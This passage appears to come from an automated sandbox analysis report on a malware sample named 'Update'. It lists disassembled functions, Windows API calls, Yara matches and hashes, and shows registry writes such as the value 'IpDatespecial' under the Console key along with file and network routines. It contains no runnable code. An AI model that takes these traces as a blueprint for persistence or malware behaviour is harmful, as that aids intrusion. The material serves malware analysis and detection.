                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 4a8643310cbe7aca331218e893e1157da8d6fc8709d708c42ef2e275ab6ca902
                                                                                            • Instruction ID: 7cd83a8b2a993512349c012916b5e11332483edbcbbc427645e390f0b3ed529d
                                                                                            • Opcode Fuzzy Hash: 4a8643310cbe7aca331218e893e1157da8d6fc8709d708c42ef2e275ab6ca902
                                                                                            • Instruction Fuzzy Hash: B141B430E0221A9FCF00DF68C884A9E7BB5AF45718F208156E8559B751E73ADA15CF91
                                                                                            Function 00919A9D Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(10015EB4,?,009175B9,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 00919AA5
                                                                                            • __mtterm.LIBCMT ref: 00919AB1
                                                                                              • Part of subcall function 0091977C: RtlDecodePointer.NTDLL(100191C8), ref: 0091978D
                                                                                              • Part of subcall function 0091977C: TlsFree.KERNEL32(100191CC,0091767C,00917662,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 009197A7
                                                                                            • TlsAlloc.KERNEL32(?,?,009175B9,10017B60,00000008,0091774D,?,?,?,10017B80,0000000C,00917808,?), ref: 00919B3E
                                                                                            • __init_pointers.LIBCMT ref: 00919B63
                                                                                            • __calloc_crt.LIBCMT ref: 00919BD1
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00919BFD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
                                                                                            • String ID:
                                                                                            • API String ID: 3766280069-0
                                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                            • Instruction ID: 1106234cad8816fa5c5eae17883908e6c58ddc9a55068a9b40994a3fce3463aa
                                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                            • Instruction Fuzzy Hash: 32314D31A40E39EEE721AF749C987853EE6EB49361B188526E455D72B0FB31D4C1CF90
                                                                                            Function 034EE6B0 Relevance: 10.5, APIs: 7, Instructions: 44filesynchronizationstringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6BD
                                                                                            • CreateFileW.KERNEL32(03510D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,034EE815,?,?,?,?,74DF23A0,00000000), ref: 034EE6D7
                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 034EE6F2
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000), ref: 034EE6FF
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 034EE70A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 034EE711
                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 034EE71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 4202892810-0
                                                                                            • Opcode ID: 658f561e0c063beca1fc3b88e6bc099c4c8351ec2563f907cd4ca6dbc9e5b6e0
                                                                                            • Instruction ID: 0833e641299037891f634c3d6ae6f693f616a8a9c2c1f5b5d44568ec952adbd3
                                                                                            • Opcode Fuzzy Hash: 658f561e0c063beca1fc3b88e6bc099c4c8351ec2563f907cd4ca6dbc9e5b6e0
                                                                                            • Instruction Fuzzy Hash: D501A471241210BBE22477A4EC0EF5A376CEB09B29F104644F725A61D4D6B1690AA765
                                                                                            Function 034F3D2E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,03506318,00000008,034F3E36,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C), ref: 034F3D3F
                                                                                            • __lock.LIBCMT ref: 034F3D73
                                                                                              • Part of subcall function 034F8E5B: __mtinitlocknum.LIBCMT ref: 034F8E71
                                                                                              • Part of subcall function 034F8E5B: __amsg_exit.LIBCMT ref: 034F8E7D
                                                                                              • Part of subcall function 034F8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,034F3F06,0000000D,03506340,00000008,034F3FFF,00000000,?,034F10F0,00000000,03506278,00000008,034F1155,?), ref: 034F8E85
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 034F3D80
                                                                                            • __lock.LIBCMT ref: 034F3D94
                                                                                            • ___addlocaleref.LIBCMT ref: 034F3DB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                            • String ID: KERNEL32.DLL
                                                                                            • API String ID: 637971194-2576044830
                                                                                            • Opcode ID: 6d63d715c96db29e8a7a51f26a0045581c721f9b8698cc01a8856756da45d7c7
                                                                                            • Instruction ID: 9a7fd6fe82a4a5c2b33156c552bfe8bcf63bc814990aff38122c008c32a5b128
                                                                                            • Opcode Fuzzy Hash: 6d63d715c96db29e8a7a51f26a0045581c721f9b8698cc01a8856756da45d7c7
                                                                                            • Instruction Fuzzy Hash: E9016D79541701EED720EFAAD80474ABBE0AF40318F14890ED59A9F3B0CBB5A645CB19
                                                                                            Function 034EB78C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 32registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 034EB7A7
                                                                                            • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 034EB7B7
                                                                                            • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 034EB7CE
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000004), ref: 034EB7D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Value$CloseDeleteOpen
                                                                                            • String ID: Console$IpDatespecial
                                                                                            • API String ID: 3183427449-1840232981
                                                                                            • Opcode ID: 27a2d78ea4fe5af06866af4b84970d91411264425fbbd61fcdc8579206676ea6
                                                                                            • Instruction ID: 5e1de5283c609ed6c18f4f3ace1cfb24cd6e2c844fa077f6f4e769cddc576795
                                                                                            • Opcode Fuzzy Hash: 27a2d78ea4fe5af06866af4b84970d91411264425fbbd61fcdc8579206676ea6
                                                                                            • Instruction Fuzzy Hash: 78F02731344340FFE3249760AD9FF1AB754FB89704F104E0DFB80650C08262E009DA16
                                                                                            Function 035002FC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 0350031D
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 0350032E
                                                                                            • __getptd.LIBCMT ref: 0350033C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: MOC$RCC$csm
                                                                                            • API String ID: 803148776-2671469338
                                                                                            • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                            • Instruction ID: 01367feb7dd4234a33e8bb23bc8faa5630395f3d234e2b3ad0f47e5c9f8d908e
                                                                                            • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                            • Instruction Fuzzy Hash: BBE01A38504204CFC760EB79D08ABA837D9BF48618F5D04A6D90CCF2B2C739E4908996
                                                                                            Function 009159E9 Relevance: 9.2, APIs: 6, Instructions: 232timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 00915A3C
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C36
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C57
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915ADB
                                                                                              • Part of subcall function 00911257: __CxxThrowException@8.LIBCMT ref: 00911267
                                                                                              • Part of subcall function 00911257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00911278
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00915CC8
                                                                                            • timeGetTime.WINMM ref: 00915CCE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 2093779962-0
                                                                                            • Opcode ID: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                                            • Instruction ID: 291950dc8edb94031133a09f1ea710b66532e70436e530c4a9d0b9aa28af938d
                                                                                            • Opcode Fuzzy Hash: eb8d99eeeeff8ed9c263c0e2c2b89902df991007dd5e8e3d3dd009670b8de4c5
                                                                                            • Instruction Fuzzy Hash: E8A1E7B0A01A5AAFE314DF6AC8C4796FBA8FB49304F50462EE12DC7640D775A964CF90
                                                                                            Function 009159F7 Relevance: 9.2, APIs: 6, Instructions: 227timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,100191B0), ref: 00915A3C
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C36
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915C57
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00915ADB
                                                                                              • Part of subcall function 00911257: __CxxThrowException@8.LIBCMT ref: 00911267
                                                                                              • Part of subcall function 00911257: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00911278
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00915CC8
                                                                                            • timeGetTime.WINMM ref: 00915CCE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                                            • String ID:
                                                                                            • API String ID: 2093779962-0
                                                                                            • Opcode ID: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                                            • Instruction ID: 42f5c972a12216f4458da436a225cac432fbf79fb0531e3f2c1951f0242a829d
                                                                                            • Opcode Fuzzy Hash: 5766cb068cc81b3afe58cea224023247e6edf2462b50dcd06bc3819791b9811b
                                                                                            • Instruction Fuzzy Hash: 1FA1E7B0A01A5AEFD314DF6AC8C4796FBA8FB49304F50462EE12DC7640D775A964CF90
                                                                                            Function 00915287 Relevance: 9.1, APIs: 6, Instructions: 123registrysleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 00915359
                                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 00915369
                                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 00915387
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00915392
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 009153F2
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0091540B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                                            • String ID:
                                                                                            • API String ID: 4289506047-0
                                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction ID: ae031d2e630e9d761622f5d88dbe4b36c2d8b1df3250a6360236a047c4cbf61b
                                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction Fuzzy Hash: 25410431744B48DBD315DB308C84FFA7BA5AB95384F5B4859E5A2DB182E3B0D882CB91
                                                                                            Function 034E9C30 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 034E9C3F
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            • _free.LIBCMT ref: 034E9C63
                                                                                            • _memset.LIBCMT ref: 034E9CBB
                                                                                              • Part of subcall function 034EA610: GetObjectW.GDI32(?,00000054,?), ref: 034EA62E
                                                                                            • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 034E9CD3
                                                                                            • _free.LIBCMT ref: 034E9CE4
                                                                                            • _free.LIBCMT ref: 034E9D23
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                            • String ID:
                                                                                            • API String ID: 1756752955-0
                                                                                            • Opcode ID: 9fd1b779244625c888b91064b5c4eae533f663bbb763986d678708273e2e19e9
                                                                                            • Instruction ID: 93c68376b0fcd0d5e59dc5574d6c5320b94c307e68b299043c4313d06c8895e2
                                                                                            • Opcode Fuzzy Hash: 9fd1b779244625c888b91064b5c4eae533f663bbb763986d678708273e2e19e9
                                                                                            • Instruction Fuzzy Hash: 3831ADB26003166BE700EE6AD880B57B7E8BB49211F04853BD9098F390E7B5E455CB99
                                                                                            Function 00915037 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 00915081
                                                                                            • WSASetLastError.WS2_32(0000139F,?,?,?,?,100191B0,?,?,10014228,000000FF), ref: 00915099
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009150A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4082018349-0
                                                                                            • Opcode ID: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                            • Instruction ID: 490a6ec0642b0ed84e596a7af9f8c4e73e8afbaa056885cf56e7c8f489e0dfc3
                                                                                            • Opcode Fuzzy Hash: e00a6cd020c07df668690f03d4002b5b8c2a1b96598de1bbe6df2cd43adfd620
                                                                                            • Instruction Fuzzy Hash: BC317076B04648EBE711CF94DC86BAAB3E8FB89711F01851AF916C7780D776E850CB50
                                                                                            Function 034E5080 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(000002FF), ref: 034E50CA
                                                                                            • WSASetLastError.WS2_32(0000139F), ref: 034E50E2
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 034E50EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4082018349-0
                                                                                            • Opcode ID: bf61b6800f9f771163710924409b9fc8e996591ad9d9d6ca044cd76b36dd1066
                                                                                            • Instruction ID: 9185783cafe917eb0b9306005a20404129db24c84ffcb7a561cdae873a323666
                                                                                            • Opcode Fuzzy Hash: bf61b6800f9f771163710924409b9fc8e996591ad9d9d6ca044cd76b36dd1066
                                                                                            • Instruction Fuzzy Hash: 4C31AE7AA04708AFD720DFA5D945F6BB3A8EB49719F00499EF915CB780D736E800CB54
                                                                                            Function 009152B0 Relevance: 9.1, APIs: 6, Instructions: 84registrysleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,10017554,00000000,00000102,?), ref: 00915359
                                                                                            • RegDeleteValueW.ADVAPI32(?,10017568), ref: 00915369
                                                                                            • RegSetValueExW.ADVAPI32(?,10017568,00000000,00000003,1001C6E0,000012A0), ref: 00915387
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00915392
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 009153F2
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0091540B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                                            • String ID:
                                                                                            • API String ID: 4289506047-0
                                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction ID: 741d45cd750f9becae838d8900c70ed27e602efef355ff3bf7c4ad311d82959c
                                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction Fuzzy Hash: 1031C230348B88DBE716CF308844FB97BB5AB99344F5F4899E1959B142C3B0D8C2CB51
                                                                                            Function 6C399CA3 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6C399DC2
                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6C39A03B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                            • String ID: csm$csm$csm
                                                                                            • API String ID: 2673424686-393685449
                                                                                            • Opcode ID: 6a27b7eb8ec2d9acfb1a4450fd8bfa0a4692859d28e34977cae2b6b9654e01b0
                                                                                            • Instruction ID: bb38649c85e41eacb6db7d620f44491a7f8dd6e3dfd0c1201b944c03ce2ff82d
                                                                                            • Opcode Fuzzy Hash: 6a27b7eb8ec2d9acfb1a4450fd8bfa0a4692859d28e34977cae2b6b9654e01b0
                                                                                            • Instruction Fuzzy Hash: 8DB17971C01309EFCF04CFA5C980A9EB7B4FF0431AB14415AE85A6BA15E336DA55CF92
                                                                                            Function 035005AE Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 035005D6
                                                                                              • Part of subcall function 035000B7: __getptd.LIBCMT ref: 035000C5
                                                                                              • Part of subcall function 035000B7: __getptd.LIBCMT ref: 035000D3
                                                                                            • __getptd.LIBCMT ref: 035005E0
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __getptd.LIBCMT ref: 035005EE
                                                                                            • __getptd.LIBCMT ref: 035005FC
                                                                                            • __getptd.LIBCMT ref: 03500607
                                                                                            • _CallCatchBlock2.LIBCMT ref: 0350062D
                                                                                              • Part of subcall function 0350015C: __CallSettingFrame@12.LIBCMT ref: 035001A8
                                                                                              • Part of subcall function 035006D4: __getptd.LIBCMT ref: 035006E3
                                                                                              • Part of subcall function 035006D4: __getptd.LIBCMT ref: 035006F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: e6880ea9d2efce5e2bbe9c213c86caad5aeceb6eef7add1038b19f9db71d0b5b
                                                                                            • Instruction ID: 3827f0bb9839fda2256696d43f15b7e0c75fb78904dc8503c35dc74a96c77a27
                                                                                            • Opcode Fuzzy Hash: e6880ea9d2efce5e2bbe9c213c86caad5aeceb6eef7add1038b19f9db71d0b5b
                                                                                            • Instruction Fuzzy Hash: 1411F975D0030ADFDB00EFA5D444B9E77B0FF44314F14806AE925AF290DB3999119F54
                                                                                            Function 0305FF6D Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CreateFrameInfo.LIBCMT ref: 0305FF95
                                                                                              • Part of subcall function 0305FA76: __getptd.LIBCMT ref: 0305FA84
                                                                                              • Part of subcall function 0305FA76: __getptd.LIBCMT ref: 0305FA92
                                                                                            • __getptd.LIBCMT ref: 0305FF9F
                                                                                              • Part of subcall function 0305381A: __getptd_noexit.LIBCMT ref: 0305381D
                                                                                              • Part of subcall function 0305381A: __amsg_exit.LIBCMT ref: 0305382A
                                                                                            • __getptd.LIBCMT ref: 0305FFAD
                                                                                            • __getptd.LIBCMT ref: 0305FFBB
                                                                                            • __getptd.LIBCMT ref: 0305FFC6
                                                                                            • _CallCatchBlock2.LIBCMT ref: 0305FFEC
                                                                                              • Part of subcall function 0305FB1B: __CallSettingFrame@12.LIBCMT ref: 0305FB67
                                                                                              • Part of subcall function 03060093: __getptd.LIBCMT ref: 030600A2
                                                                                              • Part of subcall function 03060093: __getptd.LIBCMT ref: 030600B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1602911419-0
                                                                                            • Opcode ID: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                            • Instruction ID: c6e49802c3982dd374259593b60911f3a407eb3022e2d73c0e93e9763e7b9b22
                                                                                            • Opcode Fuzzy Hash: 5f1381efd39d468ef928fc2953ab13acdae555040b7c1ee41bdff31c76f18644
                                                                                            • Instruction Fuzzy Hash: 8211C6B9D01309DFDB04EFA4D844BEEBBB1FF48310F1084A9E814AB250DB399A159F50
                                                                                            Function 034F4885 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 034F4891
                                                                                              • Part of subcall function 034F3E5B: __getptd_noexit.LIBCMT ref: 034F3E5E
                                                                                              • Part of subcall function 034F3E5B: __amsg_exit.LIBCMT ref: 034F3E6B
                                                                                            • __amsg_exit.LIBCMT ref: 034F48B1
                                                                                            • __lock.LIBCMT ref: 034F48C1
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 034F48DE
                                                                                            • _free.LIBCMT ref: 034F48F1
                                                                                            • InterlockedIncrement.KERNEL32(03612830), ref: 034F4909
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                            • String ID:
                                                                                            • API String ID: 3470314060-0
